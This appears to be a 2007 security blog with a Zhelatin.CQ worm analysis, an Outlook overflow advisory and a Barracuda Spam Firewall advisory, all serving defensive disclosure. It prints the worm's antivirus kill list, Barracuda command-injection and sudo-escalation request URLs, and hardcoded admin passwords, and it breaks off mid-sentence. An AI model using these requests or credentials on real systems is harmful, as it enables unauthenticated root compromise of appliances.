Monday, April 9, 2007

Email-Worm:W32/Zhelatin.CQ

Name : Email-Worm:W32/Zhelatin.CQ
Alias: Email-Worm.Win32.Zhelatin.cq
Type: E-Mail Worm, Rootkit
Category: Malware
Platform: Microsoft Windows Win32
Date of Discovery: April 08, 2007
Radar Alert Level 2


Summary
The Zhelatin.CQ worm started to spread late on April 8th, 2007. It arrives in e-mails with war-related subject lines, as an attachment named 'video.exe', 'movie.exe', 'click me.exe' and so on, and joins infected machines into its own peer-to-peer network.

Detailed Description
After a user runs the worm's file, it drops a randomly named file into the folder it was started from and runs it. That dropper installs a combined rootkit and peer-to-peer (p2p) component, wincom32.sys, into the Windows System folder and registers it as a service so that it is loaded at startup:

[HKLM\System\ControlSet001\Services\wincom32]
@ = "%WinSysDir%\wincom32.sys"

The installed component has rootkit features: it hides its Registry keys and its active process, so an anti-rootkit engine is needed to reveal them. It also drops a text file named wincom32.ini into the Windows System folder. This file lists the clients of the worm's peer-to-peer network; the peer names and access ports are encoded. An example of the file's contents:

[counter]
Counter=0
[peers]
003964D3640550573F800125725481EF=5326859A123900
004982069E5DB75721B54CFF33A26170=5955FC93123900
00A1836AE91D076BC265F9735204714F=451AAE831EBF00

The .ini file also has a blacklist section, which is empty at the time of writing. The worm decodes the clients' addresses and ports and joins the peer-to-peer network; a large number of outbound UDP connections can be observed while it does so.

At the same time, the copy of the worm that stays in memory starts its spreading cycle. It creates a mutex named klllekkdkkd and scans files on local hard disks for e-mail addresses, ignoring any address that contains one of the following substrings:

microsoft
.gov
.mil

The worm then mails itself to every harvested address, using one of the following subject lines (quoted verbatim, misspellings included):

USA Declares War on Iran
USA Missle Strike: Iran War just have started
Missle Strike: The USA kills more then 20000 Iranian citizens
Missle Strike: The USA kills more then 1000 Iranian citizens
Missle Strike: The USA kills more then 10000 Iranian citizens
Israel Just Have Started World War III
USA Just Have Started World War III
Iran Just Have Started World War III

The war-related subjects are an effective social engineering lure. The worm always attaches a copy of itself to the messages it sends, under one of the following names:

More.exe
Read More.exe
Click Here.exe
Click Me.exe
Read Me.exe
Movie.exe
News.exe
Video.exe

When a recipient opens such an attachment, the computer becomes infected and the spreading cycle repeats.

The worm also carries a payload: it terminates any process whose name contains one of the following substrings, which covers most anti-virus and firewall products as well as system tools such as Task Manager, regedit and msconfig:

mcafee
taskmgr
hijack
f-pro
lockdown
msconfig
firewall
blackice
avg
vsmon
zonea
spybot
nod32
reged
rav
nav
avp
troja
viru
anti
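
The indicators above (the wincom32.ini layout, the address filter and the kill list) can be turned into a small triage script. The following is an added example written for this page, not code from the original write-up or from the analysts who produced it. It parses the quoted .ini excerpt without attempting to decode the peer entries (the encoding is not documented here), applies the kill-list and address filters to constructed sample names, and, on Windows only, checks for the service key and the mutex through the Win32 API. Case-insensitive matching is an assumption; the write-up does not say how the comparison is done.

```python
"""Triage helpers for the Zhelatin.CQ indicators listed above.

Added example, not code from the original write-up. SAMPLE_INI is the
wincom32.ini excerpt quoted on the page; the process names and addresses in
the usage section are made up. Assumption: the kill-list and address filters
are matched case-insensitively (the write-up does not say).
"""
import configparser
import re
import sys

KILL_SUBSTRINGS = (
    "mcafee", "taskmgr", "hijack", "f-pro", "lockdown", "msconfig", "firewall",
    "blackice", "avg", "vsmon", "zonea", "spybot", "nod32", "reged", "rav",
    "nav", "avp", "troja", "viru", "anti",
)
IGNORED_ADDRESS_SUBSTRINGS = ("microsoft", ".gov", ".mil")
SERVICE_KEY = r"SYSTEM\ControlSet001\Services\wincom32"
MUTEX_NAME = "klllekkdkkd"

# Field shapes observed in the quoted sample: 32 hex digits = 14 hex digits.
PEER_ID_RE = re.compile(r"^[0-9A-Fa-f]{32}$")
PEER_BLOB_RE = re.compile(r"^[0-9A-Fa-f]{14}$")

SAMPLE_INI = """[counter]
Counter=0
[peers]
003964D3640550573F800125725481EF=5326859A123900
004982069E5DB75721B54CFF33A26170=5955FC93123900
00A1836AE91D076BC265F9735204714F=451AAE831EBF00
[blacklist]
"""


def parse_wincom32_ini(text):
    """Parse the [counter]/[peers]/[blacklist] sections of wincom32.ini.

    Peer entries are returned as the raw hex strings found in the file. The
    write-up says they are encoded peer addresses and ports but does not
    document the encoding, so this deliberately does not try to decode them.
    """
    cp = configparser.RawConfigParser(allow_no_value=True, delimiters=("=",),
                                      strict=False)
    cp.optionxform = str  # keep the hex ids exactly as written
    cp.read_string(text)
    peers = []
    if cp.has_section("peers"):
        for peer_id, blob in cp.items("peers"):
            if not (PEER_ID_RE.match(peer_id) and PEER_BLOB_RE.match(blob or "")):
                raise ValueError("unexpected peer entry %r=%r" % (peer_id, blob))
            peers.append((peer_id, blob))
    blacklist = dict(cp.items("blacklist")) if cp.has_section("blacklist") else {}
    return {
        "counter": cp.getint("counter", "Counter", fallback=0),
        "peers": peers,
        "blacklist": blacklist,
    }


def targeted_processes(process_names):
    """Return [(name, [matched substrings])] for every process the payload
    would kill. Some entries are very broad: 'anti' and 'viru' catch most
    security tools, 'reged' catches regedit.exe, 'nav' catches Norton AntiVirus."""
    hits = []
    for name in process_names:
        matched = [s for s in KILL_SUBSTRINGS if s in name.lower()]
        if matched:
            hits.append((name, matched))
    return hits


def is_harvested(address):
    """True if the spreader keeps this address; it drops anything containing
    'microsoft', '.gov' or '.mil'."""
    lowered = address.lower()
    return not any(s in lowered for s in IGNORED_ADDRESS_SUBSTRINGS)


def host_indicators():
    """Windows only: look for the service key and the mutex via the Win32 API.
    Returns None on other platforms. Because the component hides its registry
    keys and process from user mode, a negative result is not a clean bill."""
    if not sys.platform.startswith("win"):
        return None
    import ctypes
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICE_KEY):
            key_present = True
    except OSError:
        key_present = False
    kernel32 = ctypes.windll.kernel32
    kernel32.OpenMutexW.restype = ctypes.c_void_p
    SYNCHRONIZE = 0x00100000
    handle = kernel32.OpenMutexW(SYNCHRONIZE, False, MUTEX_NAME)
    if handle:
        kernel32.CloseHandle(ctypes.c_void_p(handle))
    return {"service_key": key_present, "mutex": bool(handle)}


if __name__ == "__main__":
    info = parse_wincom32_ini(SAMPLE_INI)
    print("peers:", len(info["peers"]), "blacklist entries:", len(info["blacklist"]))
    print(targeted_processes(["explorer.exe", "taskmgr.exe", "regedit.exe",
                              "AVGUARD.EXE", "navapw32.exe", "winword.exe"]))
    print(host_indicators())
```

Because the component hides its registry keys and process from user-mode APIs, a negative result from host_indicators() on a live system is not conclusive; confirm with an anti-rootkit tool or by parsing the SYSTEM hive offline.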


Tuesday, March 6, 2007

Microsoft Outlook Advanced Find - Remote Code Execution

Security Advisory : CT09-01-2007

Microsoft Outlook Advanced Find - Remote Code Execution
Severity: Critical
Impact: Remote System Access
Solution Status: Vendor Patch
CVE Reference: CVE-2007-0034
Advisory Date: 11th January 2007


Affected Software: Microsoft Outlook 2000
Microsoft Outlook 2002
Microsoft Outlook 2003




1. OVERVIEW

Microsoft Outlook is a popular personal communication manager that
provides end users with a unified place to manage e-mail, calendar
and contact information.

As part of its standard offering, Outlook also includes an Advanced
Search facility (Finder.exe) enabling end-users to query any aspect
of their repository information.

Finder.exe is, however, susceptible to a buffer overflow when it processes
the contents of a specially crafted Office Saved Search (.oss) file, which
an attacker can deliver remotely, for example as an e-mail attachment.


2. TECHNICAL NARRATIVE

The issue stems from an oversight in an intrinsic string manipulation
function, which copies up to 1024 bytes of user-supplied Unicode content
into a pre-allocated buffer of only 512 bytes. Length checks are
performed, but they do not prevent the copy; the exact 2:1 ratio is
consistent with a check that counts UTF-16 characters rather than bytes.

As the destination buffer cannot accommodate the additional data, the
net result is a classic stack overflow in which control of the
instruction pointer (EIP) is gained via one of several available return
addresses.
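
To make the 2:1 figure concrete, here is an added model of the flaw, written for this page and not taken from the advisory or from Finder.exe. It assumes the mechanism suggested by the numbers above: a length check that counts UTF-16 characters against a buffer sized in bytes. A byte array stands in for the stack frame and a canary after the 512-byte buffer stands in for the saved return address; the function names, sizes and canary value are the example's own.

```python
"""Model of the length-check flaw described in the technical narrative.

Added example, not Finder.exe code. The advisory states that 1024 bytes of
Unicode are copied into a 512-byte buffer although a length check runs; the
model below assumes the check counts UTF-16 characters while the buffer is
sized in bytes, which yields exactly that 2:1 overflow. A canary placed right
after the buffer stands in for the saved return address.
"""
BUF_BYTES = 512
CANARY = b"\xde\xad\xbe\xef"
SLACK = 1024  # "caller frames" beyond the canary, so overruns stay in the model


def new_frame():
    """Local buffer, then canary, then caller data (zeros)."""
    return bytearray(BUF_BYTES) + bytearray(CANARY) + bytearray(SLACK)


def canary_intact(frame):
    return bytes(frame[BUF_BYTES:BUF_BYTES + len(CANARY)]) == CANARY


def copy_name_vulnerable(frame, name):
    """Check in characters, copy in bytes: each UTF-16 code unit is 2 bytes,
    so 512 characters pass the check and 1024 bytes are written."""
    if len(name) > BUF_BYTES:              # counts characters, not bytes
        return False
    data = name.encode("utf-16-le")
    memoryview(frame)[:len(data)] = data   # unchecked copy into the frame
    return True


def copy_name_fixed(frame, name):
    """Measure the encoded length and compare it with the buffer size in the
    same unit (bytes). Encoding first also covers characters outside the BMP,
    which take two UTF-16 code units (4 bytes) each."""
    data = name.encode("utf-16-le")
    if len(data) > BUF_BYTES:
        return False
    memoryview(frame)[:len(data)] = data
    return True


def run_case(copy_fn, name):
    """Apply one copy routine to a fresh frame and report what happened."""
    frame = new_frame()
    accepted = copy_fn(frame, name)
    return {
        "accepted": accepted,
        "canary_intact": canary_intact(frame),
        "bytes_written": len(name.encode("utf-16-le")) if accepted else 0,
    }


if __name__ == "__main__":
    for label, name in (("512 BMP chars", "A" * 512),
                        ("256 non-BMP chars", "\U0001F600" * 256)):
        print(label, "vulnerable:", run_case(copy_name_vulnerable, name))
        print(label, "fixed:     ", run_case(copy_name_fixed, name))
```

The fixed routine measures the encoded length before comparing, which also handles characters outside the Basic Multilingual Plane (two UTF-16 code units each); a fix that merely halved the character limit to 256 would still let 256 such characters write 1024 bytes.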


3. EXPLOITATION

As with most file-parsing vulnerabilities, successful exploitation
requires a degree of social engineering: the victim must open the file.

However, Office Saved Search (.oss) attachments are displayed with an
icon very similar to that of an ordinary e-mail message, so an end-user
could be fooled into thinking the attachment is a harmless forwarded
mail.


4. VENDOR RESPONSE

The vendor security bulletin and corresponding patches are available at the
following location:

http://www.microsoft.com/technet/security/Bulletin/MS07-003.mspx


5. DISCLOSURE ANALYSIS

12/05/2006 - Preliminary Vendor notification.
24/05/2006 - Vulnerability confirmed by Vendor
16/10/2006 - Public Disclosure Deferred by Vendor
09/01/2007 - Public release.

Total Time to Fix: 7 months 29 Days (243 days in total)


6. CREDIT

The vulnerability was discovered by Stuart Pearson


Computer Terrorism (UK) :: Incident Response Centre.


Microsoft Outlook Malformed Email Header Remote Denial of Service Vulnerability
Bugtraq ID: 21937
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2006-1305
Remote: Yes
Local: No
Published: Jan 09 2007 12:00AM
Updated: Jan 25 2007 04:26PM
Credit: The vendor disclosed this issue.

Microsoft Outlook is prone to a remote denial-of-service vulnerability because the application fails to properly handle malformed email messages.

A remote attacker can exploit this issue to crash affected e-mail clients. Because the malformed message remains on the mail server, the client crashes again each time it tries to retrieve it, creating a prolonged denial-of-service condition until the message is removed server-side.

See the vendor bulletin: http://www.microsoft.com/technet/security/Bulletin/MS07-003.mspx

Vulnerable: Microsoft Outlook 2003 SP2
+ Microsoft Office 2003 SP3
+ Microsoft Office 2003 SP2
+ Microsoft Office 2003 SP1
+ Microsoft Office 2003
Microsoft Outlook 2003 0
+ Microsoft Office 2003 SP3
+ Microsoft Office 2003 SP2
+ Microsoft Office 2003 SP1
+ Microsoft Office 2003
Microsoft Outlook 2002 SP3
+ Microsoft Office XP SP3
Microsoft Outlook 2002 SP2
+ Microsoft Office XP SP2
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Terminal Services SP3
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Outlook 2002 SP1
+ Microsoft Office XP SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Outlook 2002 0
+ Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Outlook 2000 SP3
+ Microsoft Office 2000 SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Outlook 2000 0
- Citrix ICA Client for Windows 4.0 SP6a
+ Microsoft Office 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Outlook 2000 SR1
- Citrix ICA Client for Windows 4.0 SP6a
+ Microsoft Office 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Outlook 2000 SP2
- Citrix ICA Client for Windows 4.0 SP6a
+ Microsoft Internet Explorer for Unix SP2
+ Microsoft Office 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Office XP SP3
+ Microsoft Excel 2002 SP3
+ Microsoft FrontPage 2002 SP3
+ Microsoft Outlook 2002 SP3
+ Microsoft PowerPoint 2002 SP3
+ Microsoft Publisher 2002 SP3
+ Microsoft Word 2002 SP3
Microsoft Office XP SP2
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Office XP SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office 2003 SP2
Microsoft Office 2003 SP1
Microsoft Office 2003
+ Microsoft Excel 2003
+ Microsoft FrontPage 2003
+ Microsoft InfoPath 2003
+ Microsoft OneNote 2003 0
+ Microsoft Outlook 2003 0
+ Microsoft PowerPoint 2003 0
+ Microsoft Publisher 2003
+ Microsoft Word 2003
Microsoft Office 2000 SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Office 2000 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Internet Explorer for Unix SP2

Not Vulnerable:
(Nothing!)


Monday, February 26, 2007

Barracuda Networks Spam Firewall Multiple Vulnerabilities
Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001


The Barracuda Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, an access-validation issue and a remote command-execution issue.

A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.


-------

Matthew Hall (lists ecsc co uk)
Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006

Summary:

Lack of input sanitisation in the Barracuda Spam Firewall web interface
allows unauthenticated users to execute commands. Combined with
privilege escalation techniques, commands can be run as the root user,
allowing a full system compromise.

Details:

Following up on bid 19276 - 'Barracuda Vulnerability: Arbitrary File
Disclosure [NNL-20060801-02]' by Greg Sinclair, the Internet Defence
Security Team discovered several further vulnerabilities which, when
combined with privilege escalation techniques, allowed remote execution
of commands as the root user without any authentication.

The original discovery by Greg Sinclair showed that arbitrary files,
either owned by the user/group 'nobody:nogroup' or world-readable, could
be read through the web interface using a path sanitisation
vulnerability in preview_email.cgi, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp

Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.

The same parameter also accepts a trailing pipe character (|). The
file-open routine then runs the preceding path as a command and reads
its standard output, so the command's output is printed back to the web
interface, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20-la%20/|

Further privileges could then be obtained because the user the HTTP
daemon runs as (nobody) is granted root-level access to several system
commands via sudo, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/sudo%20touch%20/foo|

(Repeating the earlier 'ls' request should then show that the file 'foo'
has been created in '/' with root ownership.)

The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(as well as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)

Access to such commands as chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the web interface, without the use
of sudo, and would run with root privileges.

As such, a complete system compromise is possible remotely through the
web interface without any authentication.

It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' a hardcoded 'guest' user password existed,
which was 'bnadmin99'.

During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If this case is true, then it is possible to login to the web interface
as the admin user using the password 'adminbn99'.

In order to gain elevated privileges to login to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.

It was possible to expose the ssh rsa public key, which then could be
copied to a users' '.ssh/authorized_keys2' on a local machine, e.g:

